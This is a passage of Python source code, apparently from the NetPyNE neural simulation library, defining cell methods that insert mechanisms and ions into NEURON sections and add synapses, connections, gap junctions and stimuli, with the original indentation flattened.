sec['mechs'][mechName] = Dict()
try:
sec['hObj'].insert(mechName)
except:
mechInsertError = True
if sim.cfg.verbose:
print('# Error inserting %s mechanism in %s section! (check mod files are compiled)'%(mechName, sectName))
continue
for mechParamName,mechParamValue in mechParams.items(): # add params of the mechanism
mechParamValueFinal = mechParamValue
for iseg,seg in enumerate(sec['hObj']): # set mech params for each segment
if type(mechParamValue) in [list]:
if len(mechParamValue) == 1:
mechParamValueFinal = mechParamValue[0]
else:
mechParamValueFinal = mechParamValue[iseg]
if mechParamValueFinal is not None: # avoid setting None values
setattr(getattr(seg, mechName), mechParamName,mechParamValueFinal)
# add ions
if 'ions' in sectParams:
for ionName,ionParams in sectParams['ions'].items():
if ionName not in sec['ions']:
sec['ions'][ionName] = Dict()
try:
sec['hObj'].insert(ionName+'_ion') # insert mechanism
except:
mechInsertError = True
if sim.cfg.verbose:
print('# Error inserting %s ion in %s section!'%(ionName, sectName))
continue
for ionParamName,ionParamValue in ionParams.items(): # add params of the mechanism
ionParamValueFinal = ionParamValue
for iseg,seg in enumerate(sec['hObj']): # set ion params for each segment
if type(ionParamValue) in [list]:
ionParamValueFinal = ionParamValue[iseg]
if ionParamName == 'e':
setattr(seg, ionParamName+ionName, ionParamValueFinal)
elif ionParamName == 'o':
setattr(seg, '%so'%ionName, ionParamValueFinal)
h('%so0_%s_ion = %s'%(ionName,ionName,ionParamValueFinal)) # e.g. cao0_ca_ion, the default initial value
elif ionParamName == 'i':
setattr(seg, '%si'%ionName, ionParamValueFinal)
h('%si0_%s_ion = %s'%(ionName,ionName,ionParamValueFinal)) # e.g. cai0_ca_ion, the default initial value
#if sim.cfg.verbose: print("Updated ion: %s in %s, e: %s, o: %s, i: %s" % \
# (ionName, sectName, seg.__getattribute__('e'+ionName), seg.__getattribute__(ionName+'o'), seg.__getattribute__(ionName+'i')))
# add synMechs (only used when loading)
if 'synMechs' in sectParams:
for synMech in sectParams['synMechs']:
if 'label' in synMech and 'loc' in synMech:
self.addSynMech(synLabel=synMech['label'], secLabel=sectName, loc=synMech['loc'])
# add point processes
if 'pointps' in sectParams:
for pointpName,pointpParams in sectParams['pointps'].items():
#if self.tags['cellModel'] == pointpName: # only required if want to allow setting various cell models in same rule
if pointpName not in sec['pointps']:
sec['pointps'][pointpName] = Dict()
pointpObj = getattr(h, pointpParams['mod'])
loc = pointpParams['loc'] if 'loc' in pointpParams else 0.5 # set location
sec['pointps'][pointpName]['hObj'] = pointpObj(loc, sec = sec['hObj']) # create h Pointp object (eg. h.Izhi2007b)
for pointpParamName,pointpParamValue in pointpParams.items(): # add params of the point process
if pointpParamValue == 'gid':
pointpParamValue = self.gid
if pointpParamName not in ['mod', 'loc', 'vref', 'synList'] and not pointpParamName.startswith('_'):
setattr(sec['pointps'][pointpName]['hObj'], pointpParamName, pointpParamValue)
if 'params' in self.tags.keys(): # modify cell specific params
for pointpParamName,pointpParamValue in self.tags['params'].items():
setattr(sec['pointps'][pointpName]['hObj'], pointpParamName, pointpParamValue)
# set topology
for sectName,sectParams in prop['secs'].items(): # iterate sects again for topology (ensures all exist)
sec = self.secs[sectName] # pointer to child section
if 'topol' in sectParams:
if sectParams['topol']:
sec['hObj'].connect(self.secs[sectParams['topol']['parentSec']]['hObj'], sectParams['topol']['parentX'], sectParams['topol']['childX']) # make topol connection
# add dipoles
for sectName,sectParams in prop['secs'].items():
sec = self.secs[sectName]
if 'mechs' in sectParams and 'dipole' in sectParams['mechs']:
self.__dipoleInsert(sectName, sec) # add dipole mechanisms to each section
# Print message about error inserting mechanisms
if mechInsertError:
print("ERROR: Some mechanisms and/or ions were not inserted (for details run with cfg.verbose=True). Make sure the required mod files are compiled.")
def addSynMechsNEURONObj(self):
# set params for all sections
for sectName,sectParams in self.secs.items():
# add synMechs (only used when loading)
if 'synMechs' in sectParams:
for synMech in sectParams['synMechs']:
if 'label' in synMech and 'loc' in synMech:
self.addSynMech(synLabel=synMech['label'], secLabel=sectName, loc=synMech['loc'])
# Create NEURON objs for conns and syns if included in prop (used when loading)
def addStimsNEURONObj(self):
# assumes python structure exists
for stimParams in self.stims:
if stimParams['type'] == 'NetStim':
self.addNetStim(stimParams, stimContainer=stimParams)
elif stimParams['type'] in ['IClamp', 'VClamp', 'SEClamp', 'AlphaSynapse']:
stim = getattr(h, stimParams['type'])(self.secs[stimParams['sec']]['hObj'](stimParams['loc']))
stimProps = {k:v for k,v in stimParams.items() if k not in ['label', 'type', 'source', 'loc', 'sec', 'hObj']}
for stimPropName, stimPropValue in stimProps.items(): # set mechanism internal stimParams
if isinstance(stimPropValue, list):
if stimPropName == 'amp':
for i,val in enumerate(stimPropValue):
stim.amp[i] = val
elif stimPropName == 'dur':
for i,val in enumerate(stimPropValue):
stim.dur[i] = val
#setattr(stim, stimParamName._ref_[0], stimParamValue[0])
else:
setattr(stim, stimPropName, stimPropValue)
stimParams['hObj'] = stim # add stim object to dict in stims list
# Create NEURON objs for conns and syns if included in prop (used when loading)
def addConnsNEURONObj(self):
# Note: loading connections to point process (eg. Izhi2007a) not yet supported
# Note: assumes weight is in index 0 (netcon.weight[0])
from .. import sim
# assumes python structure exists
for conn in self.conns:
# set postsyn target
synMech = next((synMech for synMech in self.secs[conn['sec']]['synMechs'] if synMech['label']==conn['synMech'] and synMech['loc']==conn['loc']), None)
if not synMech:
synMech = self.addSynMech(conn['synMech'], conn['sec'], conn['loc'])
#continue # go to next conn
try:
postTarget = synMech['hObj']
except:
print('\nError: no synMech available for conn: ', conn)
print(' cell tags: ',self.tags)
print(' cell synMechs: ',self.secs[conn['sec']]['synMechs'])
import sys
sys.exit()
# create NetCon
if conn['preGid'] == 'NetStim':
netstim = next((stim['hObj'] for stim in self.stims if stim['source']==conn['preLabel']), None)
if netstim:
netcon = h.NetCon(netstim, postTarget)
else: continue
else:
#cell = next((c for c in sim.net.cells if c.gid == conn['preGid']), None)
netcon = sim.pc.gid_connect(conn['preGid'], postTarget)
netcon.weight[0] = conn['weight']
netcon.delay = conn['delay']
#netcon.threshold = conn.get('threshold', sim.net.params.defaultThreshold)
conn['hObj'] = netcon
# Add plasticity
if conn.get('plast'):
self._addConnPlasticity(conn['plast'], self.secs[conn['sec']], netcon, 0)
def associateGid (self, threshold = None):
from .. import sim
if self.secs:
if sim.cfg.createNEURONObj:
sim.pc.set_gid2node(self.gid, sim.rank) # this is the key call that assigns cell gid to a particular node
sec = next((secParams for secName,secParams in self.secs.items() if 'spikeGenLoc' in secParams), None) # check if any section has been specified as spike generator
if sec:
loc = sec['spikeGenLoc'] # get location of spike generator within section
else:
#sec = self.secs['soma'] if 'soma' in self.secs else self.secs[self.secs.keys()[0]] # use soma if exists, otherwise 1st section
sec = next((sec for secName, sec in self.secs.items() if len(sec['topol']) == 0), self.secs[list(self.secs.keys())[0]]) # root sec (no parents)
loc = 0.5
nc = None
if 'pointps' in sec: # if no syns, check if point processes with 'vref' (artificial cell)
for pointpName, pointpParams in sec['pointps'].items():
if 'vref' in pointpParams:
nc = h.NetCon(getattr(sec['pointps'][pointpName]['hObj'], '_ref_'+pointpParams['vref']), None, sec=sec['hObj'])
break
if not nc: # if still haven't created netcon
nc = h.NetCon(sec['hObj'](loc)._ref_v, None, sec=sec['hObj'])
if 'threshold' in sec: threshold = sec['threshold']
threshold = threshold if threshold is not None else sim.net.params.defaultThreshold
nc.threshold = threshold
sim.pc.cell(self.gid, nc, 1) # associate a particular output stream of events
del nc # discard netcon
sim.net.gid2lid[self.gid] = len(sim.net.gid2lid)
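# Add a synaptic mechanism defined in netParams.synMechParams at a location on a section.
# Illustrative usage (assuming a synMech labeled 'AMPA' was defined):
#   cell.addSynMech(synLabel='AMPA', secLabel='soma', loc=0.5)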
def addSynMech (self, synLabel, secLabel, loc):
from .. import sim
synMechParams = sim.net.params.synMechParams.get(synLabel) # get params for this synMech
sec = self.secs.get(secLabel, None)
# add synaptic mechanism to python struct
if 'synMechs' not in sec or not isinstance(sec['synMechs'], list):
sec['synMechs'] = []
if synMechParams and sec: # if both the synMech and the section exist
if sim.cfg.createPyStruct and sim.cfg.addSynMechs:
synMech = next((synMech for synMech in sec['synMechs'] if synMech['label']==synLabel and synMech['loc']==loc), None)
if not synMech: # if synMech not in section, then create
synMech = Dict({'label': synLabel, 'loc': loc})
for paramName, paramValue in synMechParams.items():
synMech[paramName] = paramValue
sec['synMechs'].append(synMech)
else:
synMech = None
if sim.cfg.createNEURONObj and sim.cfg.addSynMechs:
# add synaptic mechanism NEURON objectes
if not synMech: # if pointer not created in createPyStruct, then check
synMech = next((synMech for synMech in sec['synMechs'] if synMech['label']==synLabel and synMech['loc']==loc), None)
if not synMech: # if still doesnt exist, then create
synMech = Dict()
sec['synMechs'].append(synMech)
if not synMech.get('hObj'): # if synMech doesn't have NEURON obj, then create
synObj = getattr(h, synMechParams['mod'])
synMech['hObj'] = synObj(loc, sec=sec['hObj']) # create h Syn object (eg. h.Exp2Syn)
for synParamName,synParamValue in synMechParams.items(): # add params of the synaptic mechanism
if synParamName not in ['label', 'mod', 'selfNetCon', 'loc']:
setattr(synMech['hObj'], synParamName, synParamValue)
elif synParamName == 'selfNetCon': # create self netcon required for some synapses (eg. homeostatic)
secLabelNetCon = synParamValue.get('sec', 'soma')
locNetCon = synParamValue.get('loc', 0.5)
secNetCon = self.secs.get(secLabelNetCon, None)
# store the NetCon under its own key so it doesn't overwrite the synMech's hObj
synMech['hNetcon'] = h.NetCon(secNetCon['hObj'](locNetCon)._ref_v, synMech['hObj'], sec=secNetCon['hObj'])
for paramName,paramValue in synParamValue.items():
if paramName == 'weight':
synMech['hObj'].weight[0] = paramValue
elif paramName not in ['sec', 'loc']:
setattr(synMech['hObj'], paramName, paramValue)
else:
synMech = None
return synMech
def modifySynMechs (self, params):
from .. import sim
conditionsMet = 1
if 'cellConds' in params:
if conditionsMet:
for (condKey,condVal) in params['cellConds'].items(): # check if all conditions are met
# check if conditions met
if isinstance(condVal, list):
if self.tags.get(condKey) < condVal[0] or self.tags.get(condKey) > condVal[1]:
conditionsMet = 0
break
elif self.tags.get(condKey) != condVal:
conditionsMet = 0
break
if conditionsMet:
for secLabel,sec in self.secs.items():
for synMech in sec['synMechs']:
conditionsMet = 1
if 'conds' in params:
for (condKey,condVal) in params['conds'].items(): # check if all conditions are met
# check if conditions met
if condKey == 'sec':
if condVal != secLabel:
conditionsMet = 0
break
elif isinstance(condVal, list) and isinstance(condVal[0], Number):
if synMech.get(condKey) < condVal[0] or synMech.get(condKey) > condVal[1]:
conditionsMet = 0
break
elif isinstance(condVal, list) and isinstance(condVal[0], basestring):
if synMech.get(condKey) not in condVal:
conditionsMet = 0
break
elif synMech.get(condKey) != condVal:
conditionsMet = 0
break
if conditionsMet: # if all conditions are met, set values for this cell
exclude = ['conds', 'cellConds', 'label', 'mod', 'selfNetCon', 'loc']
for synParamName,synParamValue in {k: v for k,v in params.items() if k not in exclude}.items():
if sim.cfg.createPyStruct:
synMech[synParamName] = synParamValue
if sim.cfg.createNEURONObj:
try:
setattr(synMech['hObj'], synParamName, synParamValue)
except:
print('Error setting %s=%s on synMech' % (synParamName, str(synParamValue)))
def addConn (self, params, netStimParams = None):
from .. import sim
# threshold = params.get('threshold', sim.net.params.defaultThreshold) # deprecated -- use threshold in preSyn cell sec
if params.get('weight') is None: params['weight'] = sim.net.params.defaultWeight # if no weight, set default
if params.get('delay') is None: params['delay'] = sim.net.params.defaultDelay # if no delay, set default
if params.get('loc') is None: params['loc'] = 0.5 # if no loc, set default
if params.get('synsPerConn') is None: params['synsPerConn'] = 1 # if no synsPerConn, set default
# Warning if self connections
if params['preGid'] == self.gid:
if sim.cfg.allowSelfConns:
if sim.cfg.verbose: print(' Warning: created self-connection on cell gid=%d, section=%s '%(self.gid, params.get('sec')))
else:
if sim.cfg.verbose: print(' Error: attempted to create self-connection on cell gid=%d, section=%s '%(self.gid, params.get('sec')))
return # if self-connection return
# Get list of section labels
secLabels = self._setConnSections(params)
if secLabels == -1: return # if no section available exit func
# Weight
weights = self._setConnWeights(params, netStimParams, secLabels)
weightIndex = 0 # set default weight matrix index
# Delays
if isinstance(params['delay'],list):
delays = params['delay']
else:
delays = [params['delay']] * params['synsPerConn']
# Check if target is point process (artificial cell) with V not in section
pointp, weightIndex = self._setConnPointP(params, secLabels, weightIndex)
if pointp == -1: return
# Add synaptic mechanisms
if not pointp: # check not a point process
synMechs, synMechSecs, synMechLocs = self._setConnSynMechs(params, secLabels)
if synMechs == -1: return
# Adapt weight based on section weightNorm (normalization based on section location)
for i,(sec,loc) in enumerate(zip(synMechSecs, synMechLocs)):
if 'weightNorm' in self.secs[sec] and isinstance(self.secs[sec]['weightNorm'], list):
nseg = self.secs[sec]['geom']['nseg']
weights[i] = weights[i] * self.secs[sec]['weightNorm'][int(round(loc*nseg))-1]
# Create connections
for i in range(params['synsPerConn']):
if netStimParams:
netstim = self.addNetStim(netStimParams)
if params.get('gapJunction', False) == True: # only run for post gap junc (not pre)
preGapId = 1e9*sim.rank + sim.net.lastGapId # global index for presyn gap junc
postGapId = preGapId + 1 # global index for postsyn gap junc
sim.net.lastGapId += 2 # keep track of num of gap juncs in this node
if not getattr(sim.net, 'preGapJunctions', False):
sim.net.preGapJunctions = [] # if doesn't exist, create list to store presynaptic cell gap junctions
preGapParams = {'gid': params['preGid'],
'preGid': self.gid,
'sec': params.get('preSec', 'soma'),
'loc': params.get('preLoc', 0.5),
'weight': params['weight'],
'gapId': preGapId,
'preGapId': postGapId,
'synMech': params['synMech'],
'gapJunction': 'pre'}
sim.net.preGapJunctions.append(preGapParams) # add conn params to add pre gap junction later
# Python Structure
if sim.cfg.createPyStruct:
connParams = {k:v for k,v in params.items() if k not in ['synsPerConn']}
connParams['weight'] = weights[i]
connParams['delay'] = delays[i]
if not pointp:
connParams['sec'] = synMechSecs[i]
connParams['loc'] = synMechLocs[i]
if netStimParams:
connParams['preGid'] = 'NetStim'
connParams['preLabel'] = netStimParams['source']
if params.get('gapJunction', False) == True: # only run for post gap junc (not pre)
connParams['gapId'] = postGapId
connParams['preGapId'] = preGapId
connParams['gapJunction'] = 'post'
self.conns.append(Dict(connParams))
else: # do not fill in python structure (just empty dict for NEURON obj)
self.conns.append(Dict())
# NEURON objects
if sim.cfg.createNEURONObj:
# gap junctions
if params.get('gapJunction', False) in [True, 'pre', 'post']: # create NEURON obj for pre and post
synMechs[i]['hObj'].weight = weights[i]
sourceVar = self.secs[synMechSecs[i]]['hObj'](synMechLocs[i])._ref_v
targetVar = synMechs[i]['hObj']._ref_vpeer # assumes variable is vpeer -- make a parameter
sec = self.secs[synMechSecs[i]]
sim.pc.target_var(targetVar, connParams['gapId'])
self.secs[synMechSecs[i]]['hObj'].push()
sim.pc.source_var(sourceVar, connParams['preGapId'])
h.pop_section()
netcon = None
# connections using NetCons
else:
if pointp:
sec = self.secs[secLabels[0]]
postTarget = sec['pointps'][pointp]['hObj'] # local point neuron
else:
sec = self.secs[synMechSecs[i]]
postTarget = synMechs[i]['hObj'] # local synaptic mechanism
if netStimParams:
netcon = h.NetCon(netstim, postTarget) # create Netcon between netstim and target
else:
netcon = sim.pc.gid_connect(params['preGid'], postTarget) # create Netcon between global gid and target
netcon.weight[weightIndex] = weights[i] # set Netcon weight
netcon.delay = delays[i] # set Netcon delay
#netcon.threshold = threshold # set Netcon threshold
self.conns[-1]['hObj'] = netcon # add netcon object to dict in conns list
# Add time-dependent weight shaping
if 'shape' in params and params['shape']:
temptimevecs = []
tempweightvecs = []
# Default shape
pulsetype = params['shape']['pulseType'] if 'pulseType' in params['shape'] else 'square'
pulsewidth = params['shape']['pulseWidth'] if 'pulseWidth' in params['shape'] else 100.0
pulseperiod = params['shape']['pulsePeriod'] if 'pulsePeriod' in params['shape'] else 100.0
# Determine on-off switching time pairs for stimulus, where default is always on
if 'switchOnOff' not in params['shape']:
switchtimes = [0, sim.cfg.duration]
else:
if not params['shape']['switchOnOff'] == sorted(params['shape']['switchOnOff']):
raise Exception('On-off switching times for a particular stimulus are not monotonic')
switchtimes = deepcopy(params['shape']['switchOnOff'])
switchtimes.append(sim.cfg.duration)
switchiter = iter(switchtimes)
switchpairs = list(zip(switchiter,switchiter))
for pair in switchpairs:
# Note: Cliff's makestim code is in seconds, so conversions from ms to s occur in the args.
stimvecs = self._shapeStim(width=float(pulsewidth)/1000.0, isi=float(pulseperiod)/1000.0, weight=params['weight'], start=float(pair[0])/1000.0, finish=float(pair[1])/1000.0, stimshape=pulsetype)
temptimevecs.extend(stimvecs[0])
tempweightvecs.extend(stimvecs[1])
self.conns[-1]['shapeTimeVec'] = h.Vector().from_python(temptimevecs)
self.conns[-1]['shapeWeightVec'] = h.Vector().from_python(tempweightvecs)
self.conns[-1]['shapeWeightVec'].play(netcon._ref_weight[weightIndex], self.conns[-1]['shapeTimeVec'])
# Add plasticity
self._addConnPlasticity(params, sec, netcon, weightIndex)
if sim.cfg.verbose:
sec = params['sec'] if pointp else synMechSecs[i]
loc = params['loc'] if pointp else synMechLocs[i]
preGid = netStimParams['source']+' NetStim' if netStimParams else params['preGid']
try:
print((' Created connection preGid=%s, postGid=%s, sec=%s, loc=%.4g, synMech=%s, weight=%.4g, delay=%.2f'
% (preGid, self.gid, sec, loc, params['synMech'], weights[i], delays[i])))
except:
print((' Created connection preGid=%s' % (preGid)))
def modifyConns (self, params):
from .. import sim
for conn in self.conns:
conditionsMet = 1
if 'conds' in params:
for (condKey,condVal) in params['conds'].items(): # check if all conditions are met
# choose what to compare to
if condKey in ['postGid']:
compareTo = self.gid
else:
compareTo = conn.get(condKey)
# check if conditions met
if isinstance(condVal, list) and isinstance(condVal[0], Number):
if compareTo < condVal[0] or compareTo > condVal[1]:
conditionsMet = 0
break
elif isinstance(condVal, list) and isinstance(condVal[0], basestring):
if compareTo not in condVal:
conditionsMet = 0
break
elif compareTo != condVal:
conditionsMet = 0
break
if conditionsMet and 'postConds' in params:
for (condKey,condVal) in params['postConds'].items(): # check if all conditions are met
# check if conditions met
if isinstance(condVal, list) and isinstance(condVal[0], Number):
if self.tags.get(condKey) < condVal[0] or self.tags.get(condKey) > condVal[1]:
conditionsMet = 0
break
elif isinstance(condVal, list) and isinstance(condVal[0], basestring):
if self.tags.get(condKey) not in condVal:
conditionsMet = 0
break
elif self.tags.get(condKey) != condVal:
conditionsMet = 0
break
if conditionsMet and 'preConds' in params:
print('Warning: modifyConns() does not yet support conditions of presynaptic cells')
if conditionsMet: # if all conditions are met, set values for this cell
if sim.cfg.createPyStruct:
for paramName, paramValue in {k: v for k,v in params.items() if k not in ['conds','preConds','postConds']}.items():
conn[paramName] = paramValue
if sim.cfg.createNEURONObj:
for paramName, paramValue in {k: v for k,v in params.items() if k not in ['conds','preConds','postConds']}.items():
try:
if paramName == 'weight':
conn['hObj'].weight[0] = paramValue
else:
setattr(conn['hObj'], paramName, paramValue)
except:
print('Error setting %s=%s on Netcon' % (paramName, str(paramValue)))
def modifyStims (self, params):
from .. import sim
conditionsMet = 1
if 'cellConds' in params:
if conditionsMet:
for (condKey,condVal) in params['cellConds'].items(): # check if all conditions are met
# check if conditions met
if isinstance(condVal, list):
if self.tags.get(condKey) < condVal[0] or self.tags.get(condKey) > condVal[1]:
conditionsMet = 0
break
elif self.tags.get(condKey) != condVal:
conditionsMet = 0
break
if conditionsMet == 1:
for stim in self.stims:
conditionsMet = 1
if 'conds' in params:
for (condKey,condVal) in params['conds'].items(): # check if all conditions are met
# check if conditions met
if isinstance(condVal, list) and isinstance(condVal[0], Number):
if stim.get(condKey) < condVal[0] or stim.get(condKey) > condVal[1]:
conditionsMet = 0
break
elif isinstance(condVal, list) and isinstance(condVal[0], basestring):
if stim.get(condKey) not in condVal:
conditionsMet = 0
break
elif stim.get(condKey) != condVal:
conditionsMet = 0
break
if conditionsMet: # if all conditions are met, set values for this cell
if stim['type'] == 'NetStim': # for netstims, find associated netcon
conn = next((conn for conn in self.conns if conn['source'] == stim['source']), None)
if sim.cfg.createPyStruct:
for paramName, paramValue in {k: v for k,v in params.items() if k not in ['conds','cellConds']}.items():
if stim['type'] == 'NetStim' and paramName in ['weight', 'delay']:
conn[paramName] = paramValue
else:
stim[paramName] = paramValue
if sim.cfg.createNEURONObj:
for paramName, paramValue in {k: v for k,v in params.items() if k not in ['conds','cellConds']}.items():
try:
if stim['type'] == 'NetStim':
if paramName == 'weight':
conn['hObj'].weight[0] = paramValue
elif paramName in ['delay']:
setattr(conn['hObj'], paramName, paramValue)
elif paramName in ['rate']:
    stim['interval'] = 1000.0/paramValue  # rate in Hz -> interval in ms (consistent with addStim)
    setattr(stim['hObj'], 'interval', stim['interval'])
elif paramName in ['interval']:
    stim['interval'] = paramValue
    stim['rate'] = 1000.0/paramValue  # interval in ms -> rate in Hz
    setattr(stim['hObj'], 'interval', stim['interval'])
else:
setattr(stim['hObj'], paramName, paramValue)
else:
setattr(stim['hObj'], paramName, paramValue)
except:
print('Error setting %s=%s on stim' % (paramName, str(paramValue)))
def addStim (self, params):
from .. import sim
if not params['sec'] or (isinstance(params['sec'], basestring) and not params['sec'] in list(self.secs.keys())+list(self.secLists.keys())):
if sim.cfg.verbose: print(' Warning: no valid sec specified for stim on cell gid=%d so using soma or 1st available. Existing secs: %s; params: %s'%(self.gid, list(self.secs.keys()),params))
if 'soma' in self.secs:
params['sec'] = 'soma' # use 'soma' if exists
elif self.secs:
params['sec'] = list(self.secs.keys())[0] # if no 'soma', use first section available
else:
if sim.cfg.verbose: print(' Error: no Section available on cell gid=%d to add stim'%(self.gid))
return
if not 'loc' in params: params['loc'] = 0.5 # default stim location
if params['type'] == 'NetStim':
if not 'start' in params: params['start'] = 0 # add default start time
if not 'number' in params: params['number'] = 1e9 # add default number
connParams = {'preGid': params['type'],
'sec': params.get('sec'),
'loc': params.get('loc'),
'synMech': params.get('synMech'),
'weight': params.get('weight'),
'delay': params.get('delay'),
'synsPerConn': params.get('synsPerConn')}
# if 'threshold' in params: connParams['threshold'] = params.get('threshold') # deprecated, set threshold in presynaptic cell
if 'shape' in params: connParams['shape'] = params.get('shape')
if 'plast' in params: connParams['plast'] = params.get('plast')
netStimParams = {'source': params['source'],
'type': params['type'],
'rate': params['rate'] if 'rate' in params else 1000.0/params['interval'],
'noise': params['noise'] if 'noise' in params else 0.0,
'number': params['number'],
'start': params['start'],
'seed': params['seed'] if 'seed' in params else sim.cfg.seeds['stim']}
self.addConn(connParams, netStimParams)
elif params['type'] in ['IClamp', 'VClamp', 'SEClamp', 'AlphaSynapse']:
sec = self.secs[params['sec']]
stim = getattr(h, params['type'])(sec['hObj'](params['loc']))
stimParams = {k:v for k,v in params.items() if k not in ['type', 'source', 'loc', 'sec', 'label']}
stringParams = ''
for stimParamName, stimParamValue in stimParams.items(): # set mechanism internal params
if isinstance(stimParamValue, list):
if stimParamName == 'amp':
for i,val in enumerate(stimParamValue):
stim.amp[i] = val
elif stimParamName == 'dur':
for i,val in enumerate(stimParamValue):
stim.dur[i] = val
#setattr(stim, stimParamName._ref_[0], stimParamValue[0])
else:
setattr(stim, stimParamName, stimParamValue)
stringParams = stringParams + ', ' + stimParamName +'='+ str(stimParamValue)
self.stims.append(Dict(params)) # add to python structure
self.stims[-1]['hObj'] = stim # add stim object to dict in stims list
if sim.cfg.verbose: print((' Added %s %s to cell gid=%d, sec=%s, loc=%.4g%s'%
(params['source'], params['type'], self.gid, params['sec'], params['loc'], stringParams)))
else:
if sim.cfg.verbose: print(('Adding exotic stim (NeuroML 2 based?): %s'% params))
sec = self.secs[params['sec']]
stim = getattr(h, params['type'])(sec['hObj'](params['loc']))
stimParams = {k:v for k,v in params.items() if k not in ['type', 'source', 'loc', 'sec', 'label']}
stringParams = ''
for stimParamName, stimParamValue in stimParams.items(): # set mechanism internal params
if isinstance(stimParamValue, list):
print("Can't set point process paramaters of type vector eg. VClamp.amp[3]")
pass
#setattr(stim, stimParamName._ref_[0], stimParamValue[0])
elif 'originalFormat' in params and stimParamName=='originalFormat' and params['originalFormat']=='NeuroML2_stochastic_input':
if sim.cfg.verbose: print((' originalFormat: %s'%(params['originalFormat'])))
rand = h.Random()
stim_ref = params['label'][:params['label'].rfind(self.tags['pop'])]
# e.g. Stim3_2_popPyrS_2_soma_0_5 -> 2
index_in_stim = int(stim_ref.split('_')[-2])
stim_id = stim_ref.split('_')[0]
sim._init_stim_randomizer(rand, stim_id, index_in_stim, sim.cfg.seeds['stim'])
rand.negexp(1)
stim.noiseFromRandom(rand)
params['h%s'%params['originalFormat']] = rand
else:
if stimParamName in ['weight']:
setattr(stim, stimParamName, stimParamValue)
stringParams = stringParams + ', ' + stimParamName +'='+ str(stimParamValue)
self.stims.append(params) # add to python structure
self.stims[-1]['hObj'] = stim # add stim object to dict in stims list
if sim.cfg.verbose: print((' Added %s %s to cell gid=%d, sec=%s, loc=%.4g%s'%
(params['source'], params['type'], self.gid, params['sec'], params['loc'], stringParams)))
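    # Illustrative (hypothetical) stim spec consumed by addStim(); the source/mech
    # names and numeric values below are assumptions for the example only:
    # cell.addStim({'source': 'bkg', 'type': 'NetStim', 'sec': 'soma', 'loc': 0.5,
    #               'synMech': 'exc', 'weight': 0.01, 'delay': 5, 'synsPerConn': 1,
    #               'rate': 10, 'noise': 0.5})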
def _setConnSections (self, params):
from .. import sim
# if no section specified or single section specified does not exist
if not params.get('sec') or (isinstance(params.get('sec'), basestring) and not params.get('sec') in list(self.secs.keys())+list(self.secLists.keys())):
if sim.cfg.verbose: print(' Warning: no valid sec specified for connection to cell gid=%d so using soma or 1st available'%(self.gid))
if 'soma' in self.secs:
params['sec'] = 'soma' # use 'soma' if exists
elif self.secs:
params['sec'] = list(self.secs.keys())[0] # if no 'soma', use first section available
else:
if sim.cfg.verbose: print(' Error: no Section available on cell gid=%d to add connection'%(self.gid))
sec = -1 # if no Sections available print error and exit
return sec
secLabels = [params['sec']]
# if sectionList or list of sections
elif isinstance(params.get('sec'), list) or params.get('sec') in self.secLists:
secList = list(params['sec']) if isinstance(params['sec'], list) else list(self.secLists[params['sec']])
secLabels = []
validWeights, validDelays = [], []
for i, section in enumerate(secList):
    if section not in self.secs: # skip sections that don't exist, and the corresponding weight and delay
        if sim.cfg.verbose: print('  Error: Section %s not available so removing from list of sections for connection to cell gid=%d'%(section, self.gid))
    else:
        secLabels.append(section)
        if isinstance(params['weight'], list): validWeights.append(params['weight'][i])
        if isinstance(params['delay'], list): validDelays.append(params['delay'][i])
if isinstance(params['weight'], list): params['weight'] = validWeights
if isinstance(params['delay'], list): params['delay'] = validDelays
# if section is string
else:
secLabels = [params['sec']]
return secLabels
def _setConnWeights (self, params, netStimParams, secLabels):
from .. import sim
if netStimParams:
scaleFactor = sim.net.params.scaleConnWeightNetStims
elif isinstance(sim.net.params.scaleConnWeightModels, dict) and sim.net.params.scaleConnWeightModels.get(self.tags['cellModel'], None) is not None:
scaleFactor = sim.net.params.scaleConnWeightModels[self.tags['cellModel']] # use scale factor specific for this cell model
else:
scaleFactor = sim.net.params.scaleConnWeight # use global scale factor
if isinstance(params['weight'],list):
weights = [scaleFactor * w for w in params['weight']]
if len(weights) == 1: weights = [weights[0]] * params['synsPerConn']
else:
weights = [scaleFactor * params['weight']] * params['synsPerConn']
return weights
def _setConnPointP(self, params, secLabels, weightIndex):
from .. import sim
# Find if any point process with V not calculated in section (artificial cell, e.g. Izhi2007a)
pointp = None
if len(secLabels)==1 and 'pointps' in self.secs[secLabels[0]]: # check if point processes with 'vref' (artificial cell)
for pointpName, pointpParams in self.secs[secLabels[0]]['pointps'].items():
if 'vref' in pointpParams: # if includes vref param means doesn't use Section v or synaptic mechanisms
pointp = pointpName
if 'synList' in pointpParams:
if params.get('synMech') in pointpParams['synList']:
if isinstance(params.get('synMech'), list):
weightIndex = [pointpParams['synList'].index(synMech) for synMech in params.get('synMech')]
else:
weightIndex = pointpParams['synList'].index(params.get('synMech')) # update weight index based on pointp synList
if pointp and params['synsPerConn'] > 1: # only single synapse per connection rule allowed
if sim.cfg.verbose: print(' Error: Multiple synapses per connection rule not allowed for cells where V is not in section (cell gid=%d) '%(self.gid))
return -1, weightIndex
return pointp, weightIndex
def _setConnSynMechs (self, params, secLabels):
from .. import sim
synsPerConn = params['synsPerConn']
if not params.get('synMech'):
if sim.net.params.synMechParams: # if no synMech specified, but some synMech params defined
synLabel = list(sim.net.params.synMechParams.keys())[0] # select first synMech from net params and add syn
params['synMech'] = synLabel
if sim.cfg.verbose: print(' Warning: no synaptic mechanisms specified for connection to cell gid=%d so using %s '%(self.gid, synLabel))
else: # if no synaptic mechanism specified and no synMech params available
if sim.cfg.verbose: print(' Error: no synaptic mechanisms available to add conn on cell gid=%d '%(self.gid))
return -1 # if no Synapse available print error and exit
# if desired synaptic mechanism specified in conn params
if synsPerConn > 1: # if more than 1 synapse
if len(secLabels) == 1: # if single section, create all syns there
synMechSecs = [secLabels[0]] * synsPerConn # same section for all
if isinstance(params['loc'], list):
if len(params['loc']) == synsPerConn:
synMechLocs = params['loc']
else:
print("Error: The length of the list of locations does not match synsPerConn (distributing uniformly)")
synMechSecs, synMechLocs = self._distributeSynsUniformly(secList=secLabels, numSyns=synsPerConn)
else:
synMechLocs = [i*(1.0/synsPerConn)+1.0/synsPerConn/2 for i in range(synsPerConn)]
else: # if multiple sections, distribute syns
synMechSecs, synMechLocs = self._distributeSynsUniformly(secList=secLabels, numSyns=synsPerConn)
else:
synMechSecs = secLabels
synMechLocs = params['loc'] if isinstance(params['loc'], list) else [params['loc']]
# randomize the section to connect to and move it to beginning of list
if sim.cfg.connRandomSecFromList and len(synMechSecs)>1:
rand = h.Random()
preGid = params['preGid'] if isinstance(params['preGid'], int) else 0
